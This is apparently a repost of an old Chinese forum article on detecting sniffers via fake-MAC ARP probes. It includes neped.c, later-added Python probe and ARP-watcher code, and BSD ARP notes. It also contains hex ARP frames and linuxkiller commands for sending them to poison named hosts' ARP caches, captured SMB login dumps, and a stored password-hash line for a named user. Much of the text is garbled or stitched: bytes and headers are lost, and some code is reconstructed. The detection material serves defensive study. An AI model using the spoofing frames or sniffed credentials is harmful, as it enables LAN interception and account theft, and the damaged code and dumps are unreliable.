How to detect a sniffer

zhaozj 2021-02-16

L0pht has explained the technical details of sniffer detection as follows. Win9x/NT in normal mode treats only ff:ff:ff:ff:ff:ff as the broadcast address. In promiscuous mode, however, the broadcast test looks only at the first octet of the frame's Ethernet destination address, and a leading 0xff on its own is taken to mean broadcast. This small difference is enough to detect a sniffer. Some kernel versions have a related problem: in promiscuous mode every packet is handed to the operating system kernel, and when handling certain packets the kernel looks only at the IP address, never at the destination hardware address in the Ethernet header. So send a frame with a non-existent destination MAC but the correct destination IP: an affected kernel, being in promiscuous mode, accepts the frame and passes it to the corresponding protocol stack, which answers. In short, an ARP request whose Ethernet destination address is ff.00.00.00.00.00 (L0pht uses ff.ff.ff.ff.ff.ff.00) will detect Linux and Windows NICs that are in promiscuous mode. Below is a program for detecting sniffers under Linux; with a few changes it can detect Windows machines as well.

:)

/* gcc -lbsd -O3 -o linuxanti linuxanti.c */
/*
 * Network Promiscuous Ethernet Detector.
 * Linux 2.0.x/2.1.x, libc5 & glibc
 * -----------------------------------------
 * (c) 1998 savage@apostols.org
 * -----------------------------------------
 * Scan your subnet, and detect promiscuous
 * Windows & Linuxes. It really works, not a joke.
 * -----------------------------------------
 * $Id: neped.c,v 1.4 1998/07/20 22:31:52 savage Exp $
 */

/* Header names were lost on the page; they are reconstructed from the
   original comments and from what the code below actually uses. */
#include <stdio.h>
#include <stdlib.h>         /* exit() */
#include <string.h>
#include <unistd.h>         /* getuid() */
#include <fcntl.h>          /* for nonblocking */
#include <sys/types.h>
#include <sys/socket.h>     /* basic socket definitions */
#include <sys/ioctl.h>      /* SIOCGIF* */
#include <net/if.h>         /* for ifreq */
#include <netinet/in.h>
#include <arpa/inet.h>      /* inet(3) functions */

#define ETH_P_ARP        0x0806
#define MAX_PACK_LEN     2000
#define ETHER_HEADER_LEN 14
#define ARPREQUEST       1
#define ARPREPLY         2
#define perr(s)          fprintf(stderr, s)

/* Ethernet header followed by an IPv4 ARP body (42 bytes in total). */
struct arp_struct {
  u_char  dst_mac[6];
  u_char  src_mac[6];
  u_short pkt_type;
  u_short hw_type;
  u_short pro_type;
  u_char  hw_len;
  u_char  pro_len;
  u_short arp_op;
  u_char  sender_eth[6];
  u_char  sender_ip[4];
  u_char  target_eth[6];
  u_char  target_ip[4];
};

union {
  u_char full_packet[MAX_PACK_LEN];
  struct arp_struct arp_pkt;
} a;

#define full_packet a.full_packet
#define arp_pkt     a.arp_pkt

char *inetaddr(u_int32_t ip)
{
  struct in_addr in;
  in.s_addr = ip;
  return inet_ntoa(in);
}

char *hwaddr(u_char *s)
{
  static char buf[30];
  sprintf(buf, "%02x:%02x:%02x:%02x:%02x:%02x",
          s[0], s[1], s[2], s[3], s[4], s[5]);
  return buf;
}

void main(int argc, char **argv)
{
  int rec;
  int len, from_len, rsflags;
  struct ifreq if_data;
  struct sockaddr from;
  u_int8_t  mymac[6];
  u_int32_t myip, mynetmask, mybroadcast, ip, dip, sip;

  if (getuid() != 0) {
    perr("You must be root to run this program!\n");
    exit(0);
  }
  if (argc != 2) {
    fprintf(stderr, "usage: %s eth0\n", argv[0]);
    exit(0);
  }
  /* SOCK_PACKET: receive raw ARP frames on a 2.0/2.1 kernel */
  if ((rec = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP))) < 0) {
    perror("socket");
    exit(0);
  }
  printf("----------------------------------------------------------\n");

  strcpy(if_data.ifr_name, argv[1]);
  if (ioctl(rec, SIOCGIFHWADDR, &if_data) < 0) {
    perr("can't get HW addres of my interface!\n");
    exit(1);
  }
  memcpy(mymac, if_data.ifr_hwaddr.sa_data, 6);
  printf("> My HW Addr: %s\n", hwaddr(mymac));

  if (ioctl(rec, SIOCGIFADDR, &if_data) < 0) {
    perr("can't get IP addres of my interface!\n");
    exit(1);
  }
  memcpy((void *)&ip, (void *)&if_data.ifr_addr.sa_data + 2, 4);
  myip = ntohl(ip);
  printf("> My IP Addr: %s\n", inetaddr(ip));

  if (ioctl(rec, SIOCGIFNETMASK, &if_data) < 0)
    perr("can't get netmask addres of my interface!\n");
  memcpy((void *)&ip, (void *)&if_data.ifr_netmask.sa_data + 2, 4);
  mynetmask = ntohl(ip);
  printf("> My NETMASK: %s\n", inetaddr(ip));

  if (ioctl(rec, SIOCGIFBRDADDR, &if_data) < 0)
    perr("can't get broadcast addres of my interface!\n");
  memcpy((void *)&ip, (void *)&if_data.ifr_broadaddr.sa_data + 2, 4);
  mybroadcast = ntohl(ip);
  printf("> My BROADCAST: %s\n", inetaddr(ip));

  if ((rsflags = fcntl(rec, F_GETFL)) == -1) {
    perror("fcntl F_GETFL");
    exit(1);
  }
  if (fcntl(rec, F_SETFL, rsflags | O_NONBLOCK) == -1) {
    perror("fcntl F_SETFL");
    exit(1);
  }
  printf("----------------------------------------------------------\n");
  printf("> Scanning ....\n");

  /* Probe every host address of the local subnet.  The loop's upper bound is
     reconstructed from the variables above; the body that builds the ARP
     request with the fake destination MAC, sends it to dip and reads the
     replies is missing from the page.  Only the final check survived: a
     reply whose sender IP is one of the last few addresses probed comes
     from a host that accepted a frame not addressed to it. */
  for (dip = (myip & mynetmask) + 1; dip < mybroadcast; dip++) {
    /* ... send/receive code lost on the page ... */
    if ((dip - ntohl(sip) >= 0) && (dip - ntohl(sip) <= 2)) {
      printf("*> Host %s, %s **** Promiscuous mode detected !!!\n",
             inetaddr(sip), hwaddr(arp_pkt.sender_eth));
    }
  }
  printf("> End.\n");
  exit(0);
}

Sniffer Scanner, Ace Studio, 1999 (ACESTUDIO@hotmail.com). Runs on Win95/98; Winsock is not required. This program can detect computers on the network that are running a sniffer, or whose network card is in promiscuous mode. The other side's operating system can be Win95/98/NT or Linux.
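The detection rule the text describes, written out as an added example (this is not neped.c, AntiSniff or the Sniffer Scanner, and the MAC and IP values are constructed): build an ARP request for a target IP but address the Ethernet frame to ff:00:00:00:00:00, a MAC no NIC owns; a NIC in normal mode never passes such a frame up, so any reply to it proves the replying host accepted a frame not addressed to it. The `model_host` function is a constructed stand-in for the receiving side so the logic can be exercised offline; `probe_host` does the same on a live Linux interface with an `AF_PACKET` socket (root required).

```python
"""Promiscuous-mode probe using the fake-destination-MAC ARP trick."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = b"\xff" * 6
FAKE_DST_MAC = b"\xff\x00\x00\x00\x00\x00"   # ff:00:00:00:00:00, as in the text

# Ethernet header (dst, src, type) followed by the 28-byte IPv4 ARP body.
ARP_FMT = "!6s6sHHHBBH6s4s6s4s"
ARP_LEN = struct.calcsize(ARP_FMT)           # 42 bytes


def build_arp(dst_mac, src_mac, op, sender_mac, sender_ip, target_mac, target_ip):
    """Serialise one Ethernet+ARP frame (MACs as 6 raw bytes, IPs dotted)."""
    return struct.pack(ARP_FMT, dst_mac, src_mac, ETH_P_ARP, 1, 0x0800, 6, 4, op,
                       sender_mac, socket.inet_aton(sender_ip),
                       target_mac, socket.inet_aton(target_ip))


def parse_arp(frame):
    """Return the ARP fields as a dict, or None if this is not IPv4-over-Ethernet ARP."""
    if len(frame) < ARP_LEN:
        return None
    (dst, src, etype, hw, proto, hlen, plen, op,
     sha, spa, tha, tpa) = struct.unpack(ARP_FMT, frame[:ARP_LEN])
    if etype != ETH_P_ARP or hw != 1 or proto != 0x0800 or hlen != 6 or plen != 4:
        return None
    return {"dst_mac": dst, "src_mac": src, "op": op,
            "sender_mac": sha, "sender_ip": socket.inet_ntoa(spa),
            "target_mac": tha, "target_ip": socket.inet_ntoa(tpa)}


def build_probe(my_mac, my_ip, target_ip):
    """ARP request for target_ip, deliberately sent to the fake, non-broadcast MAC."""
    return build_arp(FAKE_DST_MAC, my_mac, ARP_REQUEST,
                     my_mac, my_ip, b"\x00" * 6, target_ip)


def is_promiscuous_reply(frame, my_mac, my_ip, probed_ips):
    """True if frame is an ARP reply, addressed to us, from an IP we probed.

    probed_ips must contain only addresses probed with the fake MAC: a host in
    normal mode never saw that frame, so a reply means its NIC is promiscuous.
    """
    p = parse_arp(frame)
    return (p is not None and p["op"] == ARP_REPLY
            and p["target_mac"] == my_mac and p["target_ip"] == my_ip
            and p["sender_ip"] in probed_ips)


def model_host(frame, host_mac, host_ip, promiscuous):
    """Constructed model of a receiving host, for exercising the logic offline.

    Normal mode: the NIC drops frames not sent to host_mac or broadcast.
    Promiscuous mode: every frame reaches the kernel, whose ARP code answers a
    request for host_ip without looking at the Ethernet destination.
    """
    p = parse_arp(frame)
    if p is None or p["op"] != ARP_REQUEST or p["target_ip"] != host_ip:
        return None
    if not promiscuous and p["dst_mac"] not in (host_mac, BROADCAST_MAC):
        return None                      # hardware address filter discards it
    return build_arp(p["sender_mac"], host_mac, ARP_REPLY,
                     host_mac, host_ip, p["sender_mac"], p["sender_ip"])


def probe_host(iface, my_mac, my_ip, target_ip, timeout=1.0):
    """Send one probe on a live interface (Linux, root) and wait for an answer."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    s.bind((iface, ETH_P_ARP))
    s.settimeout(timeout)
    try:
        s.send(build_probe(my_mac, my_ip, target_ip))
        while True:
            if is_promiscuous_reply(s.recv(2000), my_mac, my_ip, {target_ip}):
                return True
    except socket.timeout:
        return False
    finally:
        s.close()


# Constructed sample station and target (locally administered MACs, no real hosts).
MY_MAC, MY_IP = bytes.fromhex("020000000001"), "192.168.67.1"
TARGET_MAC, TARGET_IP = bytes.fromhex("020000000020"), "192.168.67.20"

if __name__ == "__main__":
    probe = build_probe(MY_MAC, MY_IP, TARGET_IP)
    for mode in (False, True):
        reply = model_host(probe, TARGET_MAC, TARGET_IP, promiscuous=mode)
        flagged = reply is not None and is_promiscuous_reply(reply, MY_MAC, MY_IP, {TARGET_IP})
        print(f"target promiscuous={mode}: reply={'yes' if reply else 'no'}, flagged={flagged}")
```

The page's own caveat applies unchanged: the check relies on the receiving operating system answering, so a capture device with no protocol stack bound to the interface produces no reply and goes undetected, and a host that simply has its NIC in promiscuous mode without running a sniffer is reported.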

A sniffer usually only monitors computers on the same hub (this depends mainly on the topology of the network), but detecting a sniffer has no such limit: as long as you can communicate with the other party, a sniffer on another network segment can be found too. The network configuration is detected automatically; normally nothing needs to be set. Once the scan finds that someone is eavesdropping, the other party's IP and MAC are recorded in AntiLog.txt. Note: false positives sometimes occur, usually caused by the network card driver itself. Download: http://202.115.16.8/~skyfly/Net/anti.zip or http://www2.neiep.edu.cn/ace/net/anti.zip

When a host joins the LAN, it sends a gratuitous ARP announcement to the whole subnet: a broadcast request to resolve its own IP address, with source and target IP both set to itself. Because a gratuitous ARP request (source IP and target IP identical) is seen by the entire subnet, one wrong gratuitous ARP request poisons the whole subnet. Even if a host does not send a gratuitous ARP packet, its IP-MAC pair still enters the ARP caches on the LAN through its later ordinary requests, so a conflict is not necessarily related to the gratuitous ARP packet. This can be understood as follows: when a Linux host and a PWIN98 host compete for an IP address, the Linux host wins, yet PWIN98 keeps reporting IP conflicts; obviously all the later conflict reports have nothing to do with the gratuitous ARP packet.

in_arpinput() is the classic implementation in 4.xBSD-Lite2:

1. If a request arrives for the local host's IP address, a reply is sent and an ARP entry for the requester is created (if none exists). This optimization avoids excessive ARP packet exchange.
2. If an ARP reply arrives, the corresponding ARP entry is completed: the remote host's MAC address is stored in the sockaddr_dl structure, and the packets queued for that remote host can now be sent.
3. If a remote host sends an ARP request or reply whose source IP address equals our own IP address, an IP address has been misconfigured. Net/3 detects this error and reports it to the administrator.
4. If the host receives an ARP packet from a remote host for which an entry already exists, and the sender's MAC address in the packet has changed, the MAC address in the corresponding ARP entry is updated.
5. The host can be configured as a proxy ARP server, meaning it answers ARP requests in place of the target host. Proxy ARP is discussed in Section I. The arp command is used to configure a host as a proxy ARP server.

From rule 3 we see when conflicts are detected; from rule 4 we see when the ARP cache is dynamically modified.
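Rules 3 and 4 above are exactly the conditions a defender watches for on the wire. The following is an added example, not code from this page or from any of the tools it names: a small ARP watcher that keeps its own IP-to-MAC table, reports a duplicate of our own address (rule 3), reports an existing entry whose MAC changes (rule 4) and refuses to rewrite pinned entries in the way ATF_PERM static entries are protected. The frames it is fed are constructed sample traffic with locally administered MAC addresses.

```python
"""ARP traffic watcher derived from rules 3 and 4 of in_arpinput()."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = b"\xff" * 6
ARP_FMT = "!6s6sHHHBBH6s4s6s4s"          # Ethernet header + IPv4 ARP body
ARP_LEN = struct.calcsize(ARP_FMT)       # 42 bytes


def mac_str(mac):
    return ":".join(f"{b:02x}" for b in mac)


def make_arp(op, sender_mac, sender_ip, target_ip, target_mac=b"\x00" * 6, dst=BROADCAST):
    """Build one ARP frame; used here only to construct the sample traffic."""
    return struct.pack(ARP_FMT, dst, sender_mac, ETH_P_ARP, 1, 0x0800, 6, 4, op,
                       sender_mac, socket.inet_aton(sender_ip),
                       target_mac, socket.inet_aton(target_ip))


def parse_arp(frame):
    """Decode an IPv4 ARP frame into (op, sender_mac, sender_ip, target_ip) or None."""
    if len(frame) < ARP_LEN:
        return None
    etype, hw, proto, hlen, plen, op, sha, spa, _tha, tpa = struct.unpack(ARP_FMT, frame[:ARP_LEN])[2:]
    if etype != ETH_P_ARP or hw != 1 or proto != 0x0800 or hlen != 6 or plen != 4:
        return None
    return op, sha, socket.inet_ntoa(spa), socket.inet_ntoa(tpa)


class ArpWatcher:
    """Tracks the IP -> MAC bindings seen on the segment and flags the rules above."""

    def __init__(self, my_ip, my_mac, static=None):
        self.my_ip, self.my_mac = my_ip, my_mac
        self.static = dict(static or {})     # pinned bindings, like ATF_PERM entries
        self.cache = dict(self.static)
        self.cache[my_ip] = my_mac
        self.alerts = []

    def feed(self, frame):
        """Process one frame and return what happened (None for non-ARP input)."""
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        op, sha, spa, tpa = parsed
        if spa == self.my_ip and sha != self.my_mac:          # rule 3: duplicate of our IP
            self.alerts.append(f"IP conflict: {spa} also claimed by {mac_str(sha)}")
            return "conflict"
        if spa in self.static:                                 # pinned: report, never rewrite
            if sha != self.static[spa]:
                self.alerts.append(f"static entry {spa} challenged by {mac_str(sha)}, ignored")
                return "static-violation"
            return "ok"
        if spa == "0.0.0.0":                                   # address probe, nothing to learn
            return "ok"
        if spa in self.cache:
            if self.cache[spa] != sha:                         # rule 4: binding changed
                self.alerts.append(f"{spa} moved from {mac_str(self.cache[spa])} to {mac_str(sha)}")
                self.cache[spa] = sha
                return "mac-changed"
            return "ok"
        self.cache[spa] = sha                                  # first sighting of this IP
        return "gratuitous" if spa == tpa else "learned"


# Constructed sample values (locally administered MACs, no real hosts).
MY_MAC, MY_IP = bytes.fromhex("020000000001"), "192.168.67.1"
HOST_B, HOST_B_IP = bytes.fromhex("020000000020"), "192.168.67.20"
GW_MAC, GW_IP = bytes.fromhex("0200000000fe"), "192.168.67.254"
ROGUE = bytes.fromhex("0200000000aa")

SAMPLE_FRAMES = [
    make_arp(ARP_REQUEST, HOST_B, HOST_B_IP, HOST_B_IP),           # B joins: gratuitous ARP
    make_arp(ARP_REQUEST, HOST_B, HOST_B_IP, MY_IP),               # B resolves our address
    make_arp(ARP_REPLY, ROGUE, HOST_B_IP, MY_IP, MY_MAC, MY_MAC),  # another MAC claims B's IP
    make_arp(ARP_REQUEST, ROGUE, MY_IP, MY_IP),                    # another MAC announces our IP
    make_arp(ARP_REPLY, ROGUE, GW_IP, MY_IP, MY_MAC, MY_MAC),      # another MAC claims the gateway
]


def demo():
    """Run the watcher over the sample traffic; returns (event list, watcher)."""
    w = ArpWatcher(MY_IP, MY_MAC, static={GW_IP: GW_MAC})
    return [w.feed(f) for f in SAMPLE_FRAMES], w


if __name__ == "__main__":
    kinds, w = demo()
    print(kinds)
    for line in w.alerts:
        print("ALERT:", line)
```

The gateway binding is pinned because that is the entry the text shows being overwritten on PWIN98 by a single broadcast; a watcher that never rewrites pinned entries, and reports the attempt, is the monitoring counterpart of the ATF_PERM behaviour Linux already has.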

./linuxkiller -o 0x80000200 -c 0x0806 -b140002 -q eth0

captures a complete binary dump of an ARP reply (the ASCII column of the dump, garbled in the copy, is omitted):

ByteArray [60 bytes] ---->
00000000 00 00 21 CE 28 A4 00 00-21 D1 22 F1 08 06 00 01
00000010 08 00 06 04 00 02 00 00-21 D1 22 F1 C0 A8 43 6F
00000020 00 00 21 CE 28 A4 C0 A8-43 74 20 20 20 20 20 20
00000030 20 20 20 20 20 20 20 20-20 20 20 20
[ARP/RARP] Hardware=0001 Protocol=0800 HardAddLen=06 ProAddLen=04
00:00:21:D1:22:F1 -> 00:00:21:CE:28:A4
192.168.67.111 -> 192.168.67.116

The following packets are given as on the page (bytes were lost in the copy):

-> 08 06 00 01 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0018-43 74
This packet causes the MAC of 192.168.67.111 in the ARP cache of 192.168.67.116 to become 00-00-00-00-00-00.

52:54:AB:13:E1:C8 00 00 00 00 00 00 06 00 01 08 00 06 04 00 02 FF-FF-FF-EE-EE-EE C0 A8 43 6C 00 00 00 00 00 C0 A8-43 7C
This packet causes the MAC of 192.168.67.108 in the ARP cache of 192.168.67.124 to become FF-FF-FF-EE-EE-EE.

00 00 21 CE 28 A4 00 00 00 00 00 08 06 00 01 08 00 00 00 00 00 00 C0 A8 43 6F 00 00 00 00 00 00 00 00 00 00
This one cannot work, because the entry on 192.168.67.116 would be written as 0.0.0.0.

00 00 00 11 11 11 00 00-00 00 00 00 08 06 00 01 08 00 06 04 00 02 00-00-22-F1-21-D1 C0 A8-43 6A
This causes an ARP conflict report on 192.168.67.106; the conflicting MAC address is 00-00-22-F1-21-D1.

00-00-21-D1-22-F1 00 00 00 00 00 08 06 00 01 08 00 06 04 00 02 00-00-22-F1-21-D1 C0 A8 43 65
This causes an ARP conflict report on 192.168.67.101.

Save the packets above with cat > linuxkiller.ByteArray, then run ./linuxkiller -k linuxkiller.ByteArray -w 5 to send the five conflict packets; the effect is visible immediately. Under Windows they can also be sent with NetXRay, but NetXRay has a problem: it cannot send frames below a certain size and cannot send arbitrary bytes, so you may need to pad part of the data.

ARP packets have no checksum, so there is no need to recalculate one. Causing conflicts is pointless in itself; the useful part is modifying the ARP cache, which is one component of ARP spoofing. Gratuitous ARP is needed for Mobile IP.

The Linux implementation always respects the ATF_PERM flag: a static ARP entry is not changed by received ARP packets under the ARP performance-optimization rules. On PWIN98, a static ARP entry created with arp -s is still dynamically changed by ARP packets; at least in my test, broadcasting an ARP request to the whole subnet that tried to change the gateway IP's MAC to a wrong MAC succeeded. Since an ARP broadcast is not stopped by a LAN switch or smart hub, this is a rather helpless conclusion.

The duplicated members in the copied struct were an extraction artifact and are removed here:

struct mysmbhdr {
    u_char  smb_c[4];             /* 0xff 'S' 'M' 'B', must be these four bytes */
    u_char  smb_command;          /* currently only 0x25 is processed */
    u_char  smb_errorclass;       /* 0 = success; only when these four bytes are 0 does processing continue */
    u_char  smb_reserved0;        /* 0x00 */
    u_short smb_errorcode;        /* 00 00 = success */
    u_char  smb_flags1;           /* 0x80 = server response, only this case is processed */
    u_short smb_flags2;           /* host byte order, ignored */
    u_char  smb_pad0[12];         /* all-zero padding bytes */
    u_short smb_treeid;           /* host byte order */
    u_short smb_callerpid;        /* host byte order */
    u_short smb_unauthuid;        /* host byte order */
    u_short smb_multiplexid;      /* host byte order */
    u_char  smb_countofparam;     /* number of u_shorts starting at smb_sentparambytes; ignored */
    u_short smb_sentparambytes;   /* host byte order */
    u_short smb_totalsentdata;    /* host byte order */
    u_short smb_reserved1;        /* 00 00 */
    u_short smb_paramcount;       /* host byte order */
    u_short smb_paramoffset;      /* host byte order; use this offset to determine the shared resource? */
    u_short smb_paramdisplace;    /* host byte order */
    u_short smb_datacount;        /* host byte order */
    u_short smb_dataoffset;       /* host byte order; processing starts from this offset */
    u_short smb_datadisplacement; /* host byte order */
};

Plaintext password transmission:

./linuxkiller -v 000021411 -a 110000 -b 2575006500680B32 -F 2200

One-way MAC filtering from 192.168.67.106 to 192.168.67.107, analysing SMB packets and filtering on the bytes at offset 25h of the TCP data area (75 00 65 00 68 0B 32, "u.e.h.2"):

[TCPSMB] 192.168.67.106[1190] -> 192.168.67.107[139] ByteArray [143 bytes] ---->

00000000 00 00 00 8B FF 53 4D 42-73 00 00 00 00 10 00 00
00000010 00 00 00 00 00 00 00 00-00 00 00 00 00 00 CD 16
00000020 01 00 82 A6 0D 75 00 65-00 68 0B 32 00 00 8A
00000030 14 00 00 01 00 01 00 00 00 00 01 00 00 28
00000040 00 00 00 53 43 5A 00 56-45 4E 55 53 54 45 43 48
00000050 00 57 69 6E 64 6F 77 73-20 34 2E 30 00 57 69 6E
00000060 64 6F 77 73 20 34 2E 30-00 04 FF 00 00 00 02 00
00000070 09 00 1B 00 xx xx xx xx-xx xx xx xx 00 5C 5C 56
00000080 45 4E 55 53 5C 53 43 5A-00 3F 3F 3F 3F 00

(The ASCII column of the dumps was garbled in the copy and is omitted; some hex lines are short where bytes were lost.)

Encrypted password transmission:

./linuxkiller -u 000000111111 -a 110000 -B 2575006500680B32 -F 200

[TCPSMB] 192.168.67.106[1136] -> 192.168.67.107[139] ByteArray [158 bytes] ---->
00000000 00 00 00 9A FF 53 4D 42-73 00 00 00 00 10 00 00
00000010 00 00 00 00 00 00 00 00-00 00 00 00 00 00 CD 16
00000020 01 00 01 4E 0D 75 00 65-00 68 0B 32 00 00 00 C7
00000030 1F 00 00 01 00 00 00 00 00 28
00000040 00 00 00 53 43 5A 00 56-45 4E 55 53 54 45 43 48
00000050 00 57 69 6E 64 6F 77 73-20 34 2E 30 00 57 69 6E
00000060 64 6F 77 73 20 34 2E 30-00 04 FF 00 00 00 02 00
00000070 18 00 2A 00 E4 7F 2C 5D-88 04 86 D5 2A 96 73 3C
00000080 4E 95 67 40 B8 38 F5 CB-6C 11 6D 1C 5C 5C 56 45
00000090 4E 55 53 5C 53 43 5A 00-3F 3F 3F 3F 3F 00

Field by field:

53435a00                                          SCZ
56454e55535445434800                              VENUSTECH
57696e646f777320342e3000                          Windows 4.0
57696e646f777320342e3000                          Windows 4.0
04ff000000020018002a00
e47f2c5d880486d52a96733c4e956740b838f5cb6c116d1c
5c5c56454e55535c53435a00                          \\VENUS\SCZ
3f3f3f3f3f00

Compare the result saved by Network Assassin:

SCZ/VENUSTECH:3:9f62be236e88c1be:000053435a0056454e5553544543480057696e646f77732:000000000000000000000000000000000000000000000000

Several people asked me for the program. I stripped the header files from it; there is no point discussing that, and I won't say what I do with it anyway. The header files below are for your own use. Note that some of these headers are order-sensitive: they work for me in this order, so if you add or remove any, don't change the order already given.

Compiling a socket program on Linux is not like Solaris, where you need -lnsl -lsocket; plain gcc is enough.

The header names were lost in the copy; where a comment identifies the header unambiguously it is restored, otherwise the slot is marked:

#include <ctype.h>           /* for isalpha */
#include <...>               /* header name lost on the page */
#include <...>               /* header name lost on the page */
#include <...>               /* header name lost on the page */
#include <...>               /* ANSI C header file */
#include <syslog.h>          /* for syslog() */
#include <...>               /* header name lost on the page */
#include <fcntl.h>           /* for nonblocking */
#include <...>               /* header name lost on the page */
#include <...>               /* for getpass */
#include <pthread.h>         /* for pthread_ */
#include <...>               /* header name lost on the page */
#include <...>               /* header name lost on the page */
#include <time.h>            /* timespec{} for pselect() */
#include <...>               /* header name lost on the page */
#include <sys/mman.h>        /* for mmap */
#include <sys/poll.h>        /* for poll */
#include <sys/socket.h>      /* basic socket definitions */
#include <sys/stat.h>        /* for S_xxx file mode constants */
#include <sys/time.h>        /* timeval{} for select() */
#include <sys/types.h>       /* basic system data types */
#include <sys/uio.h>         /* for iovec{} and readv/writev */
#include <sys/un.h>          /* for Unix domain sockets */
#include <...>               /* header name lost on the page */
#include <sys/shm.h>         /* for shared memory */
#include <...>               /* header name lost on the page */
#include <...>               /* for PAGE_SIZE */
#include <net/if.h>          /* for ifreq */
#include <...>               /* header name lost on the page */
#include <netinet/in.h>      /* sockaddr_in{} and other Internet defns */
#include <...>               /* for iphdr */
#include <...>               /* for icmphdr */
#include <...>               /* for igmp */
#include <...>               /* for tcphdr */
#include <...>               /* for udphdr */
#include <net/if_arp.h>      /* for arphdr */
#include <arpa/inet.h>       /* inet(3) functions */
#include <linux/if_ether.h>  /* for ethhdr, #define ETH_P_ALL 0x0003 */
#include <linux/if_packet.h> /* for struct sockaddr_ll */
#include <...>               /* header name lost on the page */
#include <...>               /* header name lost on the page */
#include <sys/sysctl.h>      /* for sysctl */

First, many thanks to Skyfly for the explanation, which answered a question I had wondered about for a long time. Last time I compiled the Linux source code brought back from Tsinghua; it set the destination MAC address with the statement below. I used to think any fake MAC would give the detection effect and did not expect there to be other subtleties. With this statement it now works for Windows and Linux at the same time:

memcpy(arp_pkt.dst_mac, "\xff\0\0\0\0\0", 6);   /* ff:00:00:00:00:00 */

I suspect the source code also contained a typo: it should not be "\255\255\255\255\255\0", which only detects promiscuous-mode NICs under Linux and not the presence of NetXRay. Because what was actually sent was ad:ad:ad:ad:ad:0, that fake MAC still found the SOCK_PACKET listener but not NetXRay. ff:00:00:00:00:00 finds both NetXRay and IPMAN, and the latter means everything built on VPacket.vxd will be found, including Network Assassin and S-Term. However, PRED also pointed out that detecting a NIC's PROMISC mode relies on the different reactions of the operating system; when the listening host has no protocol bound to the interface, this cannot detect the PROMISC-mode NIC. Although I have not tried listening with no protocol bound, the problem PRED raises should exist. I suggest removing every protocol from a PWIN98 that can otherwise join the LAN normally, reinstalling NetXRay or using IPMAN directly to listen, and seeing what the effect is. Hardware devices built specifically for LAN analysis in particular will, I estimate, not be detected by this program. Still, thinking back, there are several people who might listen on this unit's segment, so it is very practical. As soon as NetXRay starts, the NIC enters promiscuous mode, so such a host can report network conflict packets even without capturing. The same goes for the BOY series tools, LinkViewPro and so on: once started, even without listening, they put the NIC into promiscuous mode and cancel it on exit. Tools using VPacket.vxd are different: with Network Assassin, if you don't choose to monitor, the NIC stays in normal mode. I don't know how the NT monitoring tools that use packet.sys behave; I haven't tested them. Under Linux, as root, after ifconfig eth0 promisc, running AntiSniff shows the host as listening too, so you can toy with people: let him come to you first. Although I was using L0pht's AntiSniff, I had always wondered why the source code I brought back from Tsinghua didn't work, and couldn't explain it. Today Skyfly explained it and I understand; thanks again to Skyfly.

Please credit the original address when reposting: https://www.9cbs.com/read-14715.html
